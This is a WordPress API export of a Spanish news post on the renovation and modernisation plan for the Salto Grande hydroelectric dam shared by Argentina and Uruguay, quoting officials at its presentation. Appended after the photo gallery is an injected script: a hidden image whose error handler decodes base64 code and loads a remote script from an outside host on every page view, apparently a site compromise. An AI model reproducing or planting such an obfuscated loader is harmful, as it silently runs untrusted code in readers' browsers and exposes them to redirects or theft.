{"id":6628,"date":"2023-04-14T09:45:26","date_gmt":"2023-04-14T12:45:26","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=6628"},"modified":"2025-08-13T16:02:06","modified_gmt":"2025-08-13T19:02:06","slug":"argentina-uruguay-avanza-la-renovacion-y-modernizacion-de-salto-grande","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=6628","title":{"rendered":"Argentina &#8211; Uruguay: avanza la renovaci\u00f3n y modernizaci\u00f3n de Salto Grande"},"content":{"rendered":"\n<h5 class=\"has-white-color has-vivid-cyan-blue-background-color has-text-color has-background wp-block-heading\"><em>El canciller\u00a0<strong>Santiago Cafiero<\/strong>\u00a0particip\u00f3 hoy en el CCK de la presentaci\u00f3n oficial del plan de trabajo para la\u00a0<strong>Segunda Etapa del Proyecto de Renovaci\u00f3n y Modernizaci\u00f3n de Salto Grande, cuyo desarrollo estuvo a cargo de la Comisi\u00f3n T\u00e9cnica Mixta del Complejo Hidroel\u00e9ctrico binacional (Argentina \u2013 Uruguay)<\/strong>.<\/em><\/h5>\n\n\n\n<p>El evento cont\u00f3 con la participaci\u00f3n del subsecretario de Energ\u00eda El\u00e9ctrica de la Naci\u00f3n,&nbsp;<strong>Santiago Yanotti;&nbsp;<\/strong>el c\u00f3nsul uruguayo en Buenos Aires,&nbsp;<strong>Jos\u00e9 Curbelo<\/strong>; los presidentes de la Comisi\u00f3n T\u00e9cnica Mixta,&nbsp;<strong>Luis Benedetto (Argentina) y Carlos Albisu (Uruguay),&nbsp;<\/strong>y el vicecanciller<strong>, Pablo Tettamanti,&nbsp;<\/strong>entre otros.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.termatalia.com\/termatalia-2023-se-celebrara-en-uruguay\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/03\/Captura-de-pantalla-2023-03-29-121439-1024x315.jpg\" alt=\"\" class=\"wp-image-6571\" \/><\/a><\/figure>\n\n\n\n<p>Cafiero destac\u00f3&nbsp;<strong>\u201cla decisi\u00f3n pol\u00edtica de Per\u00f3n en 1946 de poner en marcha lo que era un proyecto, y nosotros creemos que lo esencial es realizar los compromisos. La realizaci\u00f3n es lo que se celebra, desde all\u00ed uno puede pararse y seguir creciendo. No nos podemos quedar con las presentaciones y los power point, que son cada vez m\u00e1s bonitos: esos son recursos publicitarios, no son recursos de la pol\u00edtica, no son recursos que mejoren la calidad de vida de argentinos y uruguayos. Los recursos de la pol\u00edtica energ\u00e9tica, en este caso, tienen que ver con la integraci\u00f3n regional\u201d<\/strong>.&nbsp;<\/p>\n\n\n\n<p><strong>\u201cCuando nosotros hablamos de integraci\u00f3n hablamos tambi\u00e9n de obras de infraestructura y esta fue y es una obra clave a la hora de definir e identificar la integraci\u00f3n de Argentina y Uruguay.&nbsp; Hoy tenemos la posibilidad, en esta larga l\u00ednea de tiempo que une la iniciativa, la exploraci\u00f3n, la realizaci\u00f3n y el presente, de decidir que queremos ser parte del futuro\u201d<\/strong>, concluy\u00f3 el canciller.&nbsp;&nbsp;<\/p>\n\n\n\n<p>Yanotti del mismo modo subray\u00f3 que \u201c<strong>estar hoy presentando el esquema de modernizaci\u00f3n nos llena de alegr\u00eda. La importancia de Salto Grande, como ox\u00edgeno y pulm\u00f3n del sistema el\u00e9ctrico y gran regulador de los dos sistemas, el argentino y el uruguayo, es reconocida por todos, como as\u00ed tambi\u00e9n la eficiencia en su funcionamiento; sabemos que Salto Grande est\u00e1 siempre que se lo requiere<\/strong>\u201d.<\/p>\n\n\n\n<p>Por su parte&nbsp;<strong>Luis Benedetto<\/strong>, presidente de la Delegaci\u00f3n Argentina, sostuvo:<strong>&nbsp;<\/strong>\u201c<strong>Queremos que este proceso sea un \u00e9xito, tal como viene siendo la primera etapa, y que nos permita no solo modernizar las instalaciones, sino que tambi\u00e9n siga fortaleciendo y redoblando la seguridad y previsi\u00f3n tanto de la generaci\u00f3n energ\u00e9tica como de su transmisi\u00f3n\u00bb<\/strong>.<\/p>\n\n\n\n<p>\u201c<strong>Esa idea que naci\u00f3 de los pioneros de la regi\u00f3n, de ingenieros, emprendedores, de so\u00f1adores, anhelaba un mejor futuro para sus ciudades y su querida Entre R\u00edos; ese rol, definido en las cartas fundacionales de Salto Grande est\u00e1 a\u00fan en deuda, y es un deber como un compromiso trabajar, como venimos haciendo en honrar esos principios fundantes, entendiendo que Salto Grande es m\u00e1s que energ\u00eda: es una oportunidad permanente, y con este plan de Renovaci\u00f3n a\u00fan m\u00e1s, para que Concordia, Federaci\u00f3n, Col\u00f3n, Salto, Paysand\u00fa, Entre R\u00edos puedan lograr una mayor desarrollo, puedan alcanzar mejores condiciones de vida para sus habitantes y empujar al desarrollo nacional<\/strong>\u201d, fundament\u00f3.<\/p>\n\n\n\n<p>En ese sentido,&nbsp;<strong>Albisu&nbsp;<\/strong>recalc\u00f3: \u201c<strong>Estamos llevando adelante lo que es la binacionalidad de la manera m\u00e1s natural, lo que es la integraci\u00f3n y lo que eso conlleva .Esta renovaci\u00f3n no hace otra cosa que potenciar lo que so\u00f1aron aquellos ciudadanos de ambas orillas y&nbsp; lo que hoy nosotros tenemos la responsabilidad de llevar adelante<\/strong>\u201d.<\/p>\n\n\n\n<p>Los gerentes generales de Salto Grande,&nbsp;<strong>Javier Murguia&nbsp;<\/strong>y<strong>&nbsp;Gabriel Sardi,<\/strong>&nbsp;expusieron al p\u00fablico el plan de trabajo para la Segunda Etapa y sus diversos estudios. La detallada exposici\u00f3n incluy\u00f3 estudios de impacto ambiental y social, junto con sus respectivas evaluaciones.&nbsp;<\/p>\n\n\n\n<p>Cabe destacar que con&nbsp;<strong>m\u00e1s de 43 a\u00f1os de operaci\u00f3n y transmisi\u00f3n de energ\u00eda, Salto Grande inici\u00f3 en el a\u00f1o 2019 un plan de renovaci\u00f3n<\/strong>, que se encuentra dividido en tres instancias que comprenden la renovaci\u00f3n de la infraestructura y equipamiento electromec\u00e1nico auxiliar y principal.<\/p>\n\n\n\n<p>Entre los trabajos previstos para la segunda etapa se destacan<strong>&nbsp;<\/strong>la renovaci\u00f3n de sistemas hidromec\u00e1nicos del vertedero y casa de m\u00e1quinas; recambio de sistemas de izaje,&nbsp; modernizaci\u00f3n de sistemas auxiliares mec\u00e1nicos y el\u00e9ctricos, sistemas de control, reemplazo de transformadores principales, nuevo equipamiento de potencia en 500 kV,&nbsp; acondicionamiento y optimizaci\u00f3n de la infraestructura civil; mejora de la gesti\u00f3n ambiental y social y modernizaci\u00f3n de sistemas de gesti\u00f3n corporativo.<\/p>\n\n\n\n<p><strong>El Complejo Hidroel\u00e9ctrico Salto Grande es un generador de recursos indispensables para la vida de la Argentina y del Uruguay<\/strong>, que implica la posibilidad de seguir trabajando y creciendo desde la regi\u00f3n por el bien com\u00fan de los pa\u00edses creadores, de sus habitantes, de su industria, su comercio y su desarrollo.<\/p>\n\n\n\n<p>Es una obra multiprop\u00f3sito que, de manera din\u00e1mica, trabaja diariamente para el cumplimiento de sus objetivos, haciendo de cada uno de ellos uno nuevo para continuar el desaf\u00edo original de cara al futuro.<\/p>\n\n\n\n<p>Salto Grande representa un&nbsp;<strong>ejemplo de integraci\u00f3n y uni\u00f3n entre dos pueblos<\/strong>&nbsp;que, cumplidos treinta a\u00f1os desde la finalizaci\u00f3n de las obras, contin\u00faa generando y transmitiendo energ\u00eda el\u00e9ctrica, estudiando y trabajando en beneficio de ambas naciones.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/whatsapp_image_2023-04-12_at_14.44.37.jpeg\"><img decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"6629\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/whatsapp_image_2023-04-12_at_14.44.37-1024x682.jpeg\" alt=\"\" class=\"wp-image-6629\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/whatsapp_image_2023-04-12_at_14.44.37-1024x682.jpeg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/whatsapp_image_2023-04-12_at_14.44.37-300x200.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/whatsapp_image_2023-04-12_at_14.44.37-768x512.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/whatsapp_image_2023-04-12_at_14.44.37-1536x1023.jpeg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/whatsapp_image_2023-04-12_at_14.44.37-696x464.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/whatsapp_image_2023-04-12_at_14.44.37-1068x712.jpeg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/whatsapp_image_2023-04-12_at_14.44.37-630x420.jpeg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/whatsapp_image_2023-04-12_at_14.44.37-320x213.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/whatsapp_image_2023-04-12_at_14.44.37-480x320.jpeg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/whatsapp_image_2023-04-12_at_14.44.37-800x533.jpeg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/whatsapp_image_2023-04-12_at_14.44.37.jpeg 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/whatsapp_image_2023-04-12_at_14.44.38.jpeg\"><img decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"6630\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/whatsapp_image_2023-04-12_at_14.44.38-1024x682.jpeg\" alt=\"\" class=\"wp-image-6630\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/whatsapp_image_2023-04-12_at_14.44.38-1024x682.jpeg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/whatsapp_image_2023-04-12_at_14.44.38-300x200.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/whatsapp_image_2023-04-12_at_14.44.38-768x512.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/whatsapp_image_2023-04-12_at_14.44.38-1536x1023.jpeg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/whatsapp_image_2023-04-12_at_14.44.38-696x464.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/whatsapp_image_2023-04-12_at_14.44.38-1068x712.jpeg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/whatsapp_image_2023-04-12_at_14.44.38-630x420.jpeg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/whatsapp_image_2023-04-12_at_14.44.38-320x213.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/whatsapp_image_2023-04-12_at_14.44.38-480x320.jpeg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/whatsapp_image_2023-04-12_at_14.44.38-800x533.jpeg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/whatsapp_image_2023-04-12_at_14.44.38.jpeg 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/figure>\n\n\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El canciller\u00a0Santiago Cafiero\u00a0particip\u00f3 hoy en el CCK de la presentaci\u00f3n oficial del plan de trabajo para la\u00a0Segunda Etapa del Proyecto de Renovaci\u00f3n y Modernizaci\u00f3n de Salto Grande, cuyo desarrollo estuvo a cargo de la Comisi\u00f3n T\u00e9cnica Mixta del Complejo Hidroel\u00e9ctrico binacional (Argentina \u2013 Uruguay). El evento cont\u00f3 con la participaci\u00f3n del subsecretario de Energ\u00eda El\u00e9ctrica [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":6630,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12],"tags":[],"class_list":["post-6628","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-internacionales"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6628","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6628"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6628\/revisions"}],"predecessor-version":[{"id":10427,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6628\/revisions\/10427"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/6630"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6628"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6628"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6628"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}